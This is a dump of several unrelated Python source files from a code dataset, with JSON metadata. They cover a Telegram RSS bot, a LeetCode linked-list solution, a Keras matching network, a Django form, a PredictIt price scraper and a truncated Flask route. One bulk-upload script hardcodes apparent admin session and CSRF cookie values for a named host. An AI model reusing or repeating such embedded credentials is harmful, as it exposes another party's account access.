motd_keyboard = None\n callbackanswer = ''\n if args[0] == 'rssmarkread':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦 ✅',\n callback_data=\"rssmarkunread,%d,%d,%d\" % (entryid,1,isstar)\n )\n ,\n InlineKeyboardButton(\n '✨'+['', ' ✅'][isstar],\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkstar\",\"rssmarkunstar\")[isstar], entryid, 1, isstar)\n )\n ]]\n callbackanswer = 'Marked as read'\n elif args[0] == 'rssmarkstar':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦 ✅',\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkread\",\"rssmarkunread\")[1],entryid,isread,1)\n )\n ,\n InlineKeyboardButton(\n '✨ ✅',\n callback_data=\"rssmarkunstar,%d,%d,%d\" % (entryid, isread, 1)\n )\n ]]\n callbackanswer = 'Starred'\n elif args[0] == 'rssmarkunread':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦',\n callback_data=\"rssmarkread,%d,%d,%d\" % (entryid,0,isstar)\n )\n ,\n InlineKeyboardButton(\n '✨'+['', ' ✅'][isstar],\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkstar\",\"rssmarkunstar\")[isstar], entryid, 0, isstar)\n )\n ]]\n callbackanswer = 'Marked as unread'\n elif args[0] == 'rssmarkunstar':\n motd_keyboard = [[\n InlineKeyboardButton(\n '📦'+['', ' ✅'][isread],\n callback_data=\"%s,%d,%d,%d\" % ((\"rssmarkread\",\"rssmarkunread\")[isread],entryid,isread,0)\n )\n ,\n InlineKeyboardButton(\n '✨',\n callback_data=\"rssmarkstar,%d,%d,%d\" % (entryid, isread, 0)\n )\n ]]\n callbackanswer = 'Star removed'\n else:\n return\n motd_markup = InlineKeyboardMarkup(motd_keyboard)\n bot.edit_message_text(\n chat_id = chat_id, \n message_id = origin_message_id,\n text = text,\n reply_markup = motd_markup\n )\n bot.answer_callback_query(\n callback_query_id=update.callback_query.id,\n text=callbackanswer\n )\n if args[0] == 'rssmarkread':\n var.set('rssunreadnum',var.get('rssunreadnum', 1)-1)\n miniflux_client.markread(entryid)\n elif args[0] == 'rssmarkstar':\n miniflux_client.markread(entryid)\n miniflux_client.markstar(entryid)\n elif args[0] == 'rssmarkunread':\n miniflux_client.markunread(entryid)\n elif args[0] == 'rssmarkunstar':\n miniflux_client.markunstar(entryid)\n else:\n return\n\n\n# _handler = CallbackQueryHandler(callback_query, pattern = r'$(rssmarkread|rssmarkstar|rssmarkunread|rssmarkunstar),')\n\n_handler = CallbackQueryHandler(callback_query)\n","sub_path":"callback_rss.py","file_name":"callback_rss.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"467239713","text":"'''\nMerge Two Sorted Lists\nCategory\tDifficulty\tLikes\tDislikes\nalgorithms\tEasy (58.09%)\t940\t-\n\nMerge two ascending linked lists into one new ascending linked list and return it. The new list is made by splicing together the nodes of the two given lists.\n\nExample:\nInput: 1->2->4, 1->3->4\nOutput: 1->1->2->3->4->4\n'''\n\n\n# @lc code=start\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = ListNode(None)\n head.next = l1\n pre = head\n cr1 = l1\n cr2 = l2\n \n while cr1 and cr2:\n if cr2.val > cr1.val:\n cr1 = cr1.next\n pre = pre.next\n else:\n temp = cr2.next\n\n pre.next = cr2\n cr2.next = cr1\n cr2 = temp\n\n pre = pre.next\n pre.next = cr1 if cr1 else cr2\n return head.next\n\n# @lc code=end\n\n'''\nAccepted\n208/208 cases passed (60 ms)\nYour runtime beats 18.41 % of python3 submissions\nYour memory usage beats 5 % of python3 submissions (13.7 
MB)\n'''","sub_path":"DHY_LeetCode/Linked-List/0021.py","file_name":"0021.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65873228","text":"import requests\nimport csv\n\nurl = \"https://devadmin.meeidol.com/news/add\"\ndata = {\n 'pic_cover': '876637a69787021adb61820b83ddf177',\n 'title': 'upload',\n 'intro': 'test',\n 'text': '',\n 'video_id' : '',\n 'news_sort': 0,\n 'stars': [],\n}\n\ncookies = {\n '_csrf-backend': \"df68a2adeda1dc72d2afa0e190fc461d00fe76321ea4a4036f7948b203855a6ba%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf-backend%22%3Bi%3A1%3Bs%3A32%3A%223lamAdjYYRqb2Pu5ORPPmgHuEzzu6qaP%22%3B%7D\",\n 'advanced-backend': \"o256humaabj1cceg7ti89ei190\"\n}\n\n#r = requests.post(url, data=data, cookies=cookies)\n\ncsv_file = open('video.csv', 'r')\nread_csv = csv.reader(csv_file)\n\nfor i in read_csv:\n# print(i[0], i[1])\n data['pic_cover'] = i[0]\n data['video_id'] = i[0]\n data['title'] = i[1]\n data['intro'] = i[1]\n r = requests.post(url, data=data, cookies=cookies)\n print(i[0], r.text.find('true') >= 0)\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"190369720","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport warnings\nwarnings.simplefilter('ignore')\n\nimport os\nimport sys\nimport numpy as np\nimport pickle\nimport json\nimport re\nimport pandas as pd\n\nfrom sklearn import tree\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import StratifiedKFold\nimport pydotplus\nfrom sklearn.externals.six import StringIO\n\nfrom skopt import gp_minimize\nfrom nysol.mining.cPredict import cPredict\n\nclass ctree(object):\n\tdef __init__(self,x_df=None,y_df=None):\n\t\tif x_df is not None and y_df is not None:\n\t\t\tself.setDataset(x_df,y_df)\n\t\tself.tree_chart=None\n\n\tdef setDataset(self,x_df,y_df):\n\t\tprint(\"##MSG: setting dataset ...\")\n\t\tif len(y_df.columns)!=1:\n\t\t\traise BaseException(\"##ERROR: DataFrame of y variable must be one column data\")\n\n\t\tself.yName=y_df.columns[0]\n\t\tclassDist=y_df[self.yName].value_counts().to_dict()\n\t\t# print(classDist)\n\t\t# {'-': 373, '+': 305}\n\t\tself.labels=sorted([c for c in classDist.keys()])\n\t\t# ['+', '-']\n\n\t\t# convert the original class values to 0/1 => used only in cross validation (it does not accept string class labels)\n\t\tstr2num={c:i for i,c in enumerate(self.labels)}\n\t\t# print(str2num)\n\t\t# {'+': 0, '-': 1}\n\t\tself.y01=np.array([str2num[v] for v in y_df[self.yName].values])\n\t\tself.y=y_df.values.reshape((-1,))\n\n\t\tself.xNames=list(x_df.columns)\n\t\tself.x=x_df.values.reshape((-1,len(x_df.columns)))\n\n\t\t# keep the smallest class size so build() can tell, right at the start, when cross validation is impossible (fewer than 10 samples)\n\t\tself.y_minClassSize=min(classDist.values())\n\n\tdef objectiveFunction(self,spaces):\n\t\tparams=self.params\n\t\tparams[\"min_samples_leaf\"]=spaces[0]\n\t\tclf=tree.DecisionTreeClassifier(**params)\n\n\t\t#skFold=KFold(n_splits=10,random_state=11)\n\t\t#skFold=StratifiedKFold(n_splits=10,random_state=11)\n\n\t\t#print(cross_val_score(clf, self.x, self.y, cv=skFold, scoring='neg_mean_squared_error'))\n\t\tscore=np.mean(cross_val_score(clf, self.x, self.y01, cv=self.skFold, 
scoring='neg_mean_squared_error'))*(-1)\n\t\tprint(\"space\",spaces[0],score)\n\t\treturn score\n\n\tdef build(self,params,opt_param=None,visualizing=True):\n\t\tprint(\"##MSG: building model ...\")\n\t\tif opt_param is not None:\n\t\t\tparams[\"min_samples_leaf\"]=opt_param\n\t\tif \"min_samples_leaf\" not in params:\n\t\t\tparams[\"min_samples_leaf\"]=0.0\n\t\tself.params=params\n\n\t\tself.cv_minFun=None\n\t\tself.cv_minX=None\n\t\t#print(self.y_minClassSize)\n\t\t#print(params[\"min_samples_leaf\"])\n\t\t#if self.y_minClassSize>=10 and not \"min_samples_leaf\" in params and params[\"min_samples_leaf\"]==0.0:\n\t\tif self.y_minClassSize>=10 and params[\"min_samples_leaf\"]==0.0:\n\t\t\tif True:\n\t\t\t\tgrid_param ={'min_samples_leaf':[i/100 for i in range(1,50,1)]}\n\n\t\t\t\tclf=tree.DecisionTreeClassifier(**params)\n\t\t\t\tgrid_search = GridSearchCV(clf, param_grid=grid_param, cv=10, scoring='neg_mean_squared_error',verbose = 0)\n\t\t\t\tgrid_search.fit(self.x,self.y01)\n\t\t\t\tparams[\"min_samples_leaf\"]=grid_search.best_params_['min_samples_leaf']\n\t\t\t\t#print(\"opt\",\"%f,%f\"%(grid_search.best_params_['min_samples_leaf'],grid_search.best_score_))\n\t\t\telse:\n\t\t\t\t# search for the optimal min_samples_leaf by Bayesian optimization (estimated via CV)\n\t\t\t\tself.skFold=StratifiedKFold(n_splits=10,random_state=11)\n\t\t\t\tspaces = [(0.0001,0.5, 'uniform')] # min_samples_leaf is capped at 0.5\n\t\t\t\tres = gp_minimize(self.objectiveFunction, spaces, n_calls=20, random_state=11)\n\t\t\t\tself.cv_minFun=res.fun # minimum objective value\n\t\t\t\tself.cv_minX=res.x[0] # optimal parameter (pruning strength)\n\t\t\t\t#print(res) # objective value\n\t\t\t\t#print(minFun,minX) # objective values\n\t\t\t\t#print(res.x) # optimal min_impurity_decrease\n\t\t\t\t#exit()\t\n\t\t\t\t# set the optimal pruning strength\n\t\t\t\tparams[\"min_samples_leaf\"]=self.cv_minX\n\t\t\t\tprint(\"opt\",\"%f,%f\"%(self.cv_minX,self.cv_minFun))\n\t\t#elif self.y_minClassSize<10:\n\t\t#\tdel params[\"min_samples_leaf\"]\n\n\t\tself.model=tree.DecisionTreeClassifier(**params)\n\t\tself.model.fit(self.x, self.y)\n\t\tself.score=self.model.score(self.x, self.y)\n\t\tself.opt_param=params[\"min_samples_leaf\"]\n\n\t\tif visualizing:\n\t\t\tself.visualize()\n\n\tdef predict(self,x_df):\n\t\tx=x_df.values.reshape((-1,len(x_df.columns)))\n\n\t\t#print(\"x.shape=\",x.shape,self.model.ds.x.shape)\n\t\ty_pred=self.model.predict(x) # [0 0 0 0 0 0 0 ...] 
# pred class table\n\t\ty_prob=self.model.predict_proba(x) # sample x class probability table\n\t\t# [[9.86925146e-01 1.30748490e-02 5.13506829e-09]\n\t\t# [9.81685740e-01 1.83142489e-02 1.10697584e-08]...\n\n\t\t# class output order for y_prob etc.\n\t\torderedLabels=self.model.classes_\n\n\t\t# convert to DataFrames that carry the ids\n\t\ty_pred=pd.DataFrame(y_pred)\n\t\ty_pred.index=x_df.index #.to_list()\n\t\ty_pred.columns=[\"y_predicted\"]\n\n\t\ty_prob=pd.DataFrame(y_prob)\n\t\ty_prob.index=x_df.index #.to_list()\n\t\tnames=[]\n\t\tfor c in orderedLabels:\n\t\t\tnames.append(\"prob_\"+str(c))\n\t\ty_prob.columns=names\n\n\t\tpred=cPredict(y_pred,y_prob,orderedLabels)\n\n\t\treturn pred\n\n\t\t# NOTE: the block below is unreachable legacy code kept from an earlier version\n\t\tpred=cPredict()\n\t\tx=x_df.values.reshape((-1,len(x_df.columns)))\n\n\t\t# in every step below, the 0.0/1.0 class values are always mapped back to the original class names\n\t\tpred.y_pred=self.model.predict(x)\n\t\tpred.y_prob=self.model.predict_proba(x)\n\t\tpred.probClassOrder=self.model.classes_ # output order of y_prob\n\t\tpred.id=x_df.index #.to_list()\n\t\tpred.labels=self.labels\n\t\treturn pred\n\n\tdef load(iFile):\n\t\twith open(iFile, 'rb') as fpr:\n\t\t\tmodel = pickle.load(fpr)\n\t\treturn model\n\n\tdef save(self,oPath):\n\t\tos.makedirs(oPath,exist_ok=True)\n\t\toFile=\"%s/model.sav\"%(oPath)\n\t\twith open(oFile, 'wb') as fpw:\n\t\t\tpickle.dump(self, fpw)\n\n\t\twith open(\"%s/tree.txt\"%(oPath),\"bw\") as f:\n\t\t\tf.write(self.tree_text.encode(\"utf-8\"))\n\n\t\tif self.tree_chart:\n\t\t\t# png/pdf output breaks with some graphviz versions, so stick to svg\n\t\t\tself.tree_chart.write_svg(\"%s/tree.svg\"%(oPath))\n\t\t\t#self.tree_chart.write_png(\"%s/tree.png\"%(oPath))\n\t\t\t#self.tree_chart.write_pdf(\"%s/tree.pdf\"%(oPath))\n\n\tdef visualize(self):#,oFile,features=None,classes=None):\n\t\tclasses=[str(v) for v in self.model.classes_] # output order of y_prob\n\n\t\t# image\n\t\tdot_data = StringIO()\n\t\t#tree.export_graphviz(self.model, out_file=dot_data,feature_names=self.xNames)\n\t\tdot=tree.export_graphviz(self.model,feature_names=self.xNames,class_names=classes)\n\n\t\t# force-rewrite the dot format\n\t\t# TODO: map the feature names properly later, or implement this as a tree method\n\t\tnewdot=[]\n\t\tpre_pattern = r'^[0-9]* \\[label=\"'\n\t\tsuf_pattern = r'\"] ;$'\n\t\tfor line in dot.split('\\n'):\n\t\t\tif re.match(pre_pattern , line):\n\t\t\t\tlbl = re.sub(suf_pattern , '' ,re.sub(pre_pattern,'',line))\n\t\t\t\tlbldata = lbl.split(\"\\\\n\")\n\t\t\t\tif len(lbldata) == 5:\n\t\t\t\t\tlblval=lbldata[0].split(' ')\n\t\t\t\t\tlblval0 = lblval[0].split(\"_\")\n\t\t\t\t\tif len(lblval0) > 1:\n\t\t\t\t\t\tif lblval[-2] == \"<=\":\n\t\t\t\t\t\t\tnn = \"_\".join(lblval0[0:-1])\n\t\t\t\t\t\t\tnewlabel = 'label=\"%s == %s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\"] ;'%(nn,lblval0[-1],lbldata[1],lbldata[2],lbldata[3],lbldata[4])\n\t\t\t\t\t\t\tnewdot.append(re.sub(r'label=\".*\"] ;',newlabel,line))\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnn = \"_\".join(lblval0[0:-1])\n\t\t\t\t\t\t\tnewlabel = 'label=\"%s != %s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\\\\\\\\n%s\"] ;'%(nn,lblval0[-1],lbldata[1],lbldata[2],lbldata[3],lbldata[4])\n\t\t\t\t\t\t\tnewdot.append(re.sub(r'label=\".*\"] ;',newlabel,line))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewdot.append(line)\n\n\t\t\t\telse:\n\t\t\t\t\tnewdot.append(line)\n\n\t\t\telse:\n\t\t\t\tnewdot.append(line)\n\n\t\tnewdotstr = '\\n'.join(newdot)\n\t\tself.tree_chart=pydotplus.graph_from_dot_data(newdotstr)\n\n\t\t# text\n\t\tself.tree_text=tree.export_text(self.model,feature_names=self.xNames,show_weights=True)\n\nif __name__ == '__main__':\n\timport dataset as ds\n\tdef 
senario1():\n\t\tconfig={}\n\t\tconfig[\"type\"]=\"table\"\n\t\tconfig[\"vars\"]=[\n\t\t\t[\"id\",\"id\",{}],\n\t\t\t[\"n1\",\"numeric\",{}],\n\t\t\t[\"n2\",\"numeric\",{}],\n\t\t\t[\"n3\",\"numeric\",{}],\n\t\t\t[\"n4\",\"numeric\",{}],\n\t\t\t[\"d1\",\"dummy\",{\"dummy_na\":True,\"drop_first\":True,\"dtype\":float}],\n\t\t\t[\"d2\",\"dummy\",{}],\n\t\t\t[\"d3\",\"dummy\",{}],\n\t\t\t[\"i1\",\"dummy\",{}],\n\t\t\t[\"i2\",\"dummy\",{}],\n\t\t\t[\"class\",\"class\",{}]\n\t\t]\n\t\tdata=ds.mkTable(config,\"./data/crx2.csv\")\n\t\tdata=data.dropna()\n\t\ty=ds.cut(data,[\"class\"])\n\t\tx=ds.cut(data,[\"class\"],reverse=True)\n\t\tds.show(x)\n\t\tds.show(y)\n\n\t\tmodel=ctree(x,y)\n\t\tparams={\"max_depth\": 10}\n\t\tmodel.build(params)\n\t\tmodel.save(\"xxctree_model_crx\")\n\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\t#print(pred.y_pred)\n\t\t#print(pred.y_true)\n\t\t#print(pred.y)\n\t\t#print(pred.stats)\n\t\t#print(pred.charts)\n\t\t#pred.charts[\"true_pred_scatter\"].savefig(\"xxa.png\")\n\t\t#pred.charts[\"roc_chart\"]\n\t\t#pred.charts[\"confusion_matrix_plot\"]\n\t\t#plt.show()\n\t\tpred.save(\"xxctree_pred_crx\")\n\n\t\tmodel=ctree.load(\"xxctree_model_crx/model.sav\")\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\tpred.save(\"xxctree_pred_crx2\")\n\n\tdef iris():\n\t\tfrom sklearn.datasets import load_iris\n\t\tiris = load_iris()\n\t\tconfig={}\n\t\tconfig[\"type\"]=\"table\"\n\t\tconfig[\"vars\"]=[\n\t\t\t[\"sepal length\",\"numeric\",{}],\n\t\t\t[\"sepal width\" ,\"numeric\",{}],\n\t\t\t[\"petal lengt\" ,\"numeric\",{}],\n\t\t\t[\"petal width\" ,\"numeric\",{}]\n\t\t]\n\t\tx=ds.mkTable(config,iris.data)\n\n\t\tconfig={}\n\t\tconfig[\"type\"]=\"table\"\n\t\tconfig[\"vars\"]=[\n\t\t\t[\"species\",\"category\",{}]\n\t\t]\n\t\ty=ds.mkTable(config,iris.target)\n\t\tds.show(x)\n\t\tds.show(y)\n\n\t\tmodel=ctree(x,y)\n\t\t# build(self,l1_ratio=1.0,cv=10,Cs=40,max_iter=100)\n\t\tmodel.build(max_iter=10000)\n\t\tmodel.save(\"xxctree_model_iris\")\n\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\tpred.save(\"xxctree_pred_iris\")\n\n\t\tmodel=ctree.load(\"xxctree_model_iris/model.sav\")\n\t\tpred=model.predict(x)\n\t\tpred.evaluate(y)\n\t\tpred.save(\"xxctree_pred_iris2\")\n\n\tsenario1()\n\t#iris()\n\texit()\n\n\n\n\timport pandas as pd\n\tfrom nysol.mining.csv2df import csv2df\n\tiFile=\"/Users/hamuro/nysol/miningpy/nysol/mining/data/crx2.csv\"\n\tdf,ds=csv2df(iFile,\"id\",[\"n1\",\"n2\",\"n3\",\"n4\"],[\"class\"],[\"d1\",\"d2\",\"d3\",\"i1\",\"i2\"])\n\n\tyName=\"class\"\n\txNames=list(ds.columns) #.to_list()\n\txNames.remove(yName)\n\tcrx_y=pd.DataFrame(ds.loc[:,yName])\n\tcrx_x=ds.loc[:,xNames]\n\tparams={\"max_depth\": 10}\n\tmodel=ctree(crx_x,crx_y,config)\n\tmodel.build()\n\tprint(\"cv_minFunc\",model.cv_minFun)\n\tprint(\"cv_minX\",model.cv_minX)\n\tprint(\"score\",model.score)\n\tmodel.visualize()\n\tmodel.save(\"xxctree_model_crx\")\n\n\tpred=model.predict(crx_x)\n\tpred.evaluate(crx_y)\n\tpred.save(\"xxctree_pred_crx\")\n\t#print(pred.y_pred)\n\t#print(pred.y_prob)\n\texit()\n\tmodel=None\n\tmodel=ctree.load(\"xxctree_model_crx/model.sav\")\n\tpred=model.predict(crx_x)\n\tpred.save(\"xxctree_pred_crx2\")\n\n\n\tfrom sklearn.datasets import load_iris\n\tiris = load_iris()\n\tprint(iris.data)\n\tprint(iris.target)\n\n\tconfig={}\n\tconfig[\"type\"]=\"table\"\n\tconfig[\"names\"]=[\"sepal length\",\"sepal width\",\"petal length\",\"petal 
width\"]\n\tconfig[\"convs\"]=[\"numeric()\",\"numeric()\",\"numeric()\",\"numeric()\"]\n\tiris_x=ds.mkTable(config,iris.data)\n\tds.show(iris_x)\n\n\tconfig={}\n\tconfig[\"type\"]=\"table\"\n\tconfig[\"names\"]=[\"species\"]\n\tconfig[\"convs\"]=[\"category()\"]\n\tiris_y=ds.mkTable(config,iris.target)\n\tds.show(iris_y)\n\n\tmodel=ctree(iris_x,iris_y)\n\n\t#print(tbl.__class__.__name__)\n\tmodel.build(params)\n\tmodel.visualize()\n\tmodel.save(\"xxctree_model_iris\")\n\n\tpred=model.predict(iris_x)\n\t#print(pred.y_prob[0],pred.y_pred[0])\n\tpred.evaluate(iris_y)\n\tpred.save(\"xxctree_pred_iris\")\n\t#print(pred.y_pred)\n\t#print(pred.y_prob)\n\n\tmodel=None\n\tmodel=ctree.load(\"xxctree_model_iris/model.sav\")\n\tpred=model.predict(iris_x)\n\tpred.save(\"xxctree_pred_iris2\")\n\tprint(model.labels)\n\n\n","sub_path":"nysol/mining/ctree.py","file_name":"ctree.py","file_ext":"py","file_size_in_byte":11279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341329811","text":"#!/usr/bin/env python3\n\n#########################\n#\n# name: pull_data.py\n# description: gets the data\n# of interest (probability of\n# winning nomination\n# and probability of\n# winning general,\n# calculates implied conditional\n# win prob and writes output to\n# csv\n###########################\n\nimport urllib.request\nimport urllib.parse\nimport json\nimport datetime\nimport pytz\nimport csv\nimport os\nimport sys\n\n# global url/path parameters \napi_prefix = \"https://www.predictit.org/api/marketdata/markets/\"\nall_market_api = \"https://www.predictit.org/api/marketdata/all/\"\noutdir = \"../dat\"\ncsv_name = \"candidate_win_probabilities.csv\"\ncsv_path = os.path.join(outdir, csv_name)\n\ndem_nominee_id = 3633\ngop_nominee_id = 3653\npres_winner_id = 3698\n\ndefault_markets = {\n \"dem-nominee\": dem_nominee_id,\n \"gop-nominee\": gop_nominee_id,\n \"pres-winner\": pres_winner_id}\n\ndef mkdirp(file_path):\n directory = os.path.dirname(file_path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_market(market_id, api_prefix = api_prefix):\n full_url = urllib.request.urljoin(api_prefix, str(market_id))\n response = urllib.request.urlopen(full_url)\n txtdata = response.read()\n result = json.loads(txtdata)\n if result is None:\n raise ValueError(\"No parseable market found for market id \"\n \"{}\".format(market_id))\n return result\n\ndef get_all_markets(all_market_api = all_market_api):\n response = urllib.request.urlopen(all_market_api)\n txtdata = response.read()\n result = json.loads(txtdata)\n if result is None:\n raise ValueError(\"No parseable market data \"\n \"found for market api \"\n \"{}\".format(all_market_api))\n return result['markets']\n\n\ndef prune_market(market_dict, min_price):\n return {contract['name']: contract for\n contract in market_dict['contracts']\n if contract['bestBuyYesCost'] > min_price}\n\n\ndef get_latest_prices(min_price = 0.01,\n markets = default_markets):\n\n markets = {market_name: prune_market(get_market(market_id),\n min_price)\n for market_name, market_id in markets.items()}\n\n return markets\n\ndef calc_conditional_prob(candidate_id,\n nominee_market,\n pres_market,\n win_prob_key=\"bestBuyYesCost\"):\n win_nom = nominee_market.get(candidate_id, {}).get(win_prob_key)\n win_pres = pres_market.get(candidate_id, {}).get(win_prob_key)\n if win_nom is not None and win_pres is not None:\n return win_pres / win_nom\n else:\n return None\n \ndef 
pull_current_data(win_prob_key=\"bestBuyYesCost\"):\n\n current_datetime = datetime.datetime.now(pytz.utc)\n \n data = get_latest_prices()\n\n results = []\n \n for party in ['dem', 'gop']:\n party_results = data[party + '-nominee']\n for candidate in party_results.keys():\n pres_prob = data['pres-winner'].get(candidate, {}).get(win_prob_key, None)\n nom_prob = party_results.get(candidate, {}).get(win_prob_key, None)\n cond_prob = calc_conditional_prob(candidate,\n party_results,\n data['pres-winner'])\n new_row = {\n 'candidate': candidate,\n 'party': party,\n 'probNominee': nom_prob,\n 'probPresident': pres_prob,\n 'probPresidentGivenNominee': cond_prob,\n 'whenPulled': current_datetime.isoformat()\n }\n\n results.append(new_row)\n\n pass\n\n return results \n\n\ndef pull_and_save_data(csv_path=csv_path):\n\n new_data = pull_current_data()\n\n mkdirp(csv_path)\n \n with open(csv_path, 'a+') as f:\n f.seek(0) # jump to the beginning of the file\n try:\n header = next(csv.reader(f))\n dict_writer = csv.DictWriter(f, header) # header found\n except StopIteration: # no header found\n header = list(new_data[0].keys())\n dict_writer = csv.DictWriter(f, header)\n dict_writer.writeheader()\n f.seek(0,2) # jump back to the end of the file\n for data_row in new_data:\n try:\n dict_writer.writerow(data_row)\n except ValueError:\n print(\"Error writing row to csv. \"\n \"Check for header/key mismatch\\n\\n\"\n \"Header: {}\\n\"\n \"Keys: {}\\n\\n\".format(header, data_row.keys()))\n raise\n print(\"Data successfully pulled and written to csv \"\n \"{}\".format(csv_path))\n \nif __name__ == \"__main__\":\n script_path = os.path.relpath(sys.argv[0])\n if 'src' in script_path:\n run_outdir = \"dat\"\n else:\n run_outdir = \"../dat\"\n out_path = os.path.join(run_outdir, csv_name)\n \n pull_and_save_data(csv_path=out_path)\n","sub_path":"src/pull_data.py","file_name":"pull_data.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"474806916","text":"# matching model\nimport os\nimport sys\nimport random\nimport numpy as np\nfrom keras.layers import *\nfrom keras.models import Model, Sequential\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom keras import initializers\nfrom keras.models import load_model\nimport tensorflow as tf\nfrom match import cosine_sim, euclidean_sim\n\n\ndef conv(input):\n\treg = l2(0.0005)\n\tx = Conv2D(32,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block1_conv1')(input)\n\tx = Conv2D(32,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block1_conv2')(x)\n\tx = MaxPooling2D((2,2), name = 'block1_pool')(x)\n\tx = Dropout(0.25)(x)\n\n\tx = Conv2D(64,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block2_conv1')(x)\n\tx = Conv2D(64,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block2_conv2')(x)\n\tx = MaxPooling2D((2,2), name = 'block2_pool')(x)\n\tx = Dropout(0.25)(x)\n\n\tx = Conv2D(128,(3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block3_conv1')(x)\n\tx = Conv2D(128, (3,3), activation = 'elu', padding = 'same', kernel_regularizer = reg, name = 'block3_conv2')(x)\n\tx = MaxPooling2D((2,2), name = 'block3_pool')(x)\n\tx = Dropout(0.25)(x)\n\n\tx = Flatten()(x)\n\n\tx = Dense(units = 256, activation = 'elu', kernel_regularizer = reg, name = 'fc1')(x)\n\t#x = Dense(units = 64, activation = 'elu', 
kernel_regularizer = reg, name = 'fc2')(x)\n\n\treturn x\n\n\ndef matching_net(sample_ = 5, average_per_class_ = True, img_size = 32, batch_size = 32, nway = 20):\n\tn_supportset_ = sample_ * nway\n\tinput1 = Input((n_supportset_, img_size, img_size ,3))\n\tinput2 = Input((img_size, img_size ,3))\n\n\ttmp_in = Input((img_size, img_size, 3))\n\tconv_emb = conv(tmp_in)\n\tconv_net = Model(inputs = tmp_in, outputs = conv_emb)\n\tconv_net.load_weights('model/pretrained2.h5', by_name = True)\n\t#conv_net.load_weights('model/matching_pre2.h5', by_name = True)\n\n\tsupport_label = Input((n_supportset_, nway))\n\n\tinputs = []\n\tfor lidx in range(n_supportset_):\n\t\t\tinputs.append(conv_net(Lambda(lambda x: x[:,lidx,:,:,:])(input1)))\n\n\tinputs.append(conv_net(input2))\n\n\tinputs.append(support_label)\n\n\t#out = euclidean_sim(nway = nway, sample = sample)(inputs)\n\tout = cosine_sim(nway = nway, sample = sample_, batch = batch_size, average_per_class = average_per_class_)(inputs)\n\n\tmodel = Model(inputs = [input1, input2, support_label], outputs = out)\n\n\treturn conv_net, model","sub_path":"task2/matchingnet/matching_model.py","file_name":"matching_model.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248640994","text":"# _*_ coidng:utf-8 _*_\nfrom django import forms\nfrom django.core.exceptions import ValidationError\n\ndef words_validator(comment):\n if len(comment) < 4:\n raise ValidationError('Not enough words')\n\ndef comment_validator(comment):\n if 'a' in comment:\n raise ValidationError('Don\\'t use \\'a\\' word')\n\nclass CommentForm(forms .Form):\n name = forms.CharField(max_length=50)\n comment = forms.CharField(\n widget=forms.Textarea(),\n error_messages={\n 'required': 'wwwwwws'\n },\n validators=[words_validator,comment_validator],\n )\n","sub_path":"01/firstsite/firstapp/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631040639","text":"#!/usr/bin/env python2\n# coding=utf-8\n\nall = ['robot']\n\nimport os, sys\n\ncurrent_path = os.path.dirname(__file__)\napp_root = os.path.join(current_path, os.path.pardir, os.path.pardir)\nsys.path.insert(0, app_root) # 网站根目录加入搜索路径\n\nimport template\nfrom models import CmdAdmin, Canteen, Meal\n\n\n############## Models ##################\ndef print_orders(order):\n return template.orderinfo.format(order.name, order.canteen,\n order.studentName, order.studentId, order.birthday, order.token)\n\n\ndef print_my_orders(my_order):\n return template.myorder.format(\n Meal.get(my_order.mealId).name,\n my_order.studentName,\n my_order.studentId,\n my_order.birthday,\n Canteen.get(my_order.canteenId).name,\n my_order.token)\n\n\ndef authchecker(func):\n \"\"\"\n 管理员权限验证\n \"\"\"\n\n def _authchecker(message):\n try:\n result = CmdAdmin.getBy(weixinId=message.source)\n if result == None:\n pass\n else:\n return func(message)\n except Exception as err:\n return \"出现错误: \" + str(err)\n\n return _authchecker\n","sub_path":"controllers/webchat/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"13213730","text":"from flask import Flask, request, make_response\napp = Flask(__name__)\n\ncestos = {}\n@app.route(\"/adicionaAoCesto\")\ndef adicionaAoCesto():\n\n prodID 